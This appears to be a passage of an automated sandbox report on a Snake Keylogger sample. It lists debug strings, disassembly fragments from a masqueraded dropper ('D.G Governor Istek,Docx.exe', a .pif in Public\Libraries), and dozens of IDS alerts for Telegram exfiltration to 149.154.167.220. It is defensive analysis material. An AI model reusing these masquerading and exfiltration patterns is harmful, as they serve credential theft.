          Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdb source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020820000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020793000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020780000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: _.pdb source: xzeheenC.pif, 00000004.00000002.3467561668.000000001CE1B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000003.2246468592.000000001B22B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468182063.000000001D270000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3471183670.000000001E2F1000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3474258234.0000000035551000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3474966321.0000000036AA0000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471014628.000000003428B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000003.2351649309.0000000032623000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000003.2424661790.000000002ED4E000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3471453220.0000000031D71000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468359572.0000000030CA0000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468030849.00000000308EB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdbGCTL source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227120369.00000000218B2000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227120369.00000000218E1000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020820000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000003.2338267499.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020793000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020780000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000003.2338267499.0000000000773000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 0000000A.00000003.2418480318.000000000084F000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 0000000A.00000003.2418480318.0000000000826000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029C58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_029C58B4
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h4_2_1CF0E158
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 1F6EE5E8h4_2_1F6EE1C8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_1F6EC0F0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20A8FC25h4_2_20A8F888
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20A8C81Dh4_2_20A8C480
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20A8F095h4_2_20A8ECF8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20A8BC8Dh4_2_20A8B8F0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20A8D3ADh4_2_20A8D010
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20A803E3h4_2_20A80040
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20A8D975h4_2_20A8D5D8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20A8A56Dh4_2_20A8A1D0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20A8E505h4_2_20A8E168
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20A8B0FDh4_2_20A8AD60
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20A8C255h4_2_20A8BEB8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20A8F65Dh4_2_20A8F2C0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20A809ABh4_2_20A80608
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20A8CDE5h4_2_20A8CA48
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20A8DF3Dh4_2_20A8DBA0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20A8AB35h4_2_20A8A798
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20A8B6C5h4_2_20A8B328
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20A8EACDh4_2_20A8E730
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20AA863Dh4_2_20AA82A0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20AAC03Dh4_2_20AABCA0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20AA8075h4_2_20AA7CD8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20AABA75h4_2_20AAB6D8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20AA91CDh4_2_20AA8E30
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20AA09A5h4_2_20AA0608
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20AA8C05h4_2_20AA8868
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20AAC605h4_2_20AAC268
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20AA03DDh4_2_20AA0040
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20AAA355h4_2_20AA9FB8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20AAA91Dh4_2_20AAA580
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20AA1535h4_2_20AA1198
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20AA9D8Fh4_2_20AA99E8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20AA9795h4_2_20AA93F8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20AA0F6Dh4_2_20AA0BD0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20AA74BDh4_2_20AA7120
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20AAB4ADh4_2_20AAB110
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20AA7AADh4_2_20AA7710
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20AA1AFDh4_2_20AA1760
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 20AAAEE5h4_2_20AAAB48
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_20AA542C
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_20AA5020
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_20AA5010
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]4_2_20CACAD0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]4_2_20CADA70
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then lea esp, dword ptr [ebp-08h]4_2_20D9C5A0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h9_2_340FE158
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 371EE5E8h9_2_371EE1C8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_371EC0F0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E2DF3Dh9_2_37E2DBA0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E2AB35h9_2_37E2A798
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E2B6C5h9_2_37E2B328
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E2EACDh9_2_37E2E730
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E2F65Dh9_2_37E2F2C0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E2C255h9_2_37E2BEB8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E2CDE5h9_2_37E2CA48
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E209ABh9_2_37E20608
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E2A56Dh9_2_37E2A1D0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E2D975h9_2_37E2D5D8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E2B0FDh9_2_37E2AD60
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E2E505h9_2_37E2E168
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E2BC8Dh9_2_37E2B8F0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E2F095h9_2_37E2ECF8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E2C81Dh9_2_37E2C480
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E2FC25h9_2_37E2F888
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E203E3h9_2_37E20040
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E2D3ADh9_2_37E2D010
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E49D8Fh9_2_37E499E8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E49795h9_2_37E493F8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E40F6Dh9_2_37E40BD0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E4A355h9_2_37E49FB8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E4A91Dh9_2_37E4A580
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E41535h9_2_37E41198
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E41AFDh9_2_37E41760
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E4AEE5h9_2_37E4AB48
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E474BDh9_2_37E47120
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E4B4ADh9_2_37E4B110
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E47AADh9_2_37E47710
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E48075h9_2_37E47CD8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E4BA75h9_2_37E4B6D8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E4C03Dh9_2_37E4BCA0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E4863Dh9_2_37E482A0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E48C05h9_2_37E48868
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E4C605h9_2_37E4C268
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E403DDh9_2_37E40040
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E491CDh9_2_37E48E30
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then jmp 37E409A5h9_2_37E40608
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]9_2_37E45020
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]9_2_37E4542C
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]9_2_37E45010
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]9_2_3804DA67
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]9_2_3804DA68
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]9_2_38043EFA
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4x nop then lea esp, dword ptr [ebp-08h]9_2_3813C4F0

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49782 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49799 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49758 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49800 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49812 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49790 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49846 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49847 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49829 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49830 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49835 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49848 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49857 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49856 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49888 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49897 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49913 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49926 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49889 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49898 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49896 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49821 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49904 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49890 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49941 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49905 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49928 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49936 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49944 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49958 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49952 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49911 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49966 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49976 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49950 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49989 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49959 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49912 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49921 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49943 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49990 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49974 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49903 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49998 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49982 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49991 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49920 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49973 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49967 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49854 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49937 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50012 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49997 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49919 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50030 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50029 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50021 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49934 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50020 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49929 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50013 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49999 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49960 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49984 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50066 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50007 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50057 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50037 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50053 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50046 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50049 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50045 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50052 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50014 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50059 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50072 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49949 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49983 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50073 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50067 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50081 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50089 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50028 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50096 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50087 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50022 -> 149.154.167.220:443
